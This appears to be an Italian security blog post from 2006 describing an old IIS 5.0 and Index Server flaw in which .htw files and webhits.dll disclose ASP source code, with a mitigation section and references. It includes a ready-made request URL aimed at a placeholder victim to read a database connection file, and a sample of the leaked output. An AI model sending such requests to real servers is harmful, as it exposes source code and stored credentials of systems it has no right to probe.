RedTomahawk

In questo blog voglio mostrarvi una serie di attacchi che possono essere sferrati a voi o ai sistemi informatci aziendali. Il WWW è ormai diventata la strada digitale per eccellenza. Come nel mondo reale se gli edifici sono ben protetti potremmo sentirci sicuri all'interno delle nostre "mura domestiche", mentre se lasciamo le porte aperte, prima o poi qualcuno proverà ad entrare.

venerdì, gennaio 13, 2006

IIS e Index Server

Recentemente ho dovuto testare la sicurezza di un sito web aziendale che utilizza ASP con SOM su una macchina Windows 2000 con IIS 5.0.
Il sito di importanza vitale per l'azienda è accessibile dall'intranet e da internet.


Tra i vari tentativi di intrusione ho testato un errore di configurazione spesso presente su applicazioni che utilizzano l'architettura descritta sopra.
Questo errore di configurazione rigurda i files HTW di webhits.

Questa vulnerabilità si basa sull'applicazione ISAPI webhits.dll, la quale ha la funzione di evidenziare le ricerche effettuate dal motore di ricerca integrato Index Server di Microsoft. Scoperta dal gruppo Cerberus Information Security, ad essere colpito questa volta oltre ad IIS 4.0, abbiamo anche Windows 2000 in tutte le sue versioni. Fondamentali per la nostra riuscita sono i file ".htw".

Ci sono varie tecniche per far fruttare questo baco, ma descriverò quella con meno caratteri:

Inviate questa stringa verso la vostra vittima:

http://www.victim.com/null.htw?CiWebHitsFile=/secure/db_connections.asp&CiRestriction=none&CiHiliteType=full

IIS vi risponderà con una stringa tipo questa:

0) Then Response.Write(thisPage.location+"?"+Left(Request.QueryString(),InStr(1,Request.QueryString(),"&all")-1)) Else Response.Write(thisPage.location)%>">
[...]

Una risposta del genere fa intuire immediatamente che c'è qualcosa che non va. Con una ricerca massiva, pagina per pagina, non sarà difficile individuare dati sensibili nei sorgenti da poter sfruttare per un successivo attacco.

Come proteggersi?

Oltre a installare i vari bug fix e service pack rilasciati da microsoft, vi consiglio di eliminare l'esecuzione dei files HTW dalla configurazione del vostro sito.


Per approfondimenti:

Microsoft WebHits:
http://www.microsoft.com/technet/prodtechnol/sscomm/reskit/webhits.mspx
Microsoft IIS Security Guide:
http://www.microsoft.com/italy/pmi/sicurezza/sgc/articles/sec_iis_5_0_5_1.mspx
PacketStorm
http://packetstormsecurity.org/0001-exploits/iis4.webhits.txt

Links to this post:

Crea un link

<< Home

Statistiche sito,contatore visite, counter web invisibile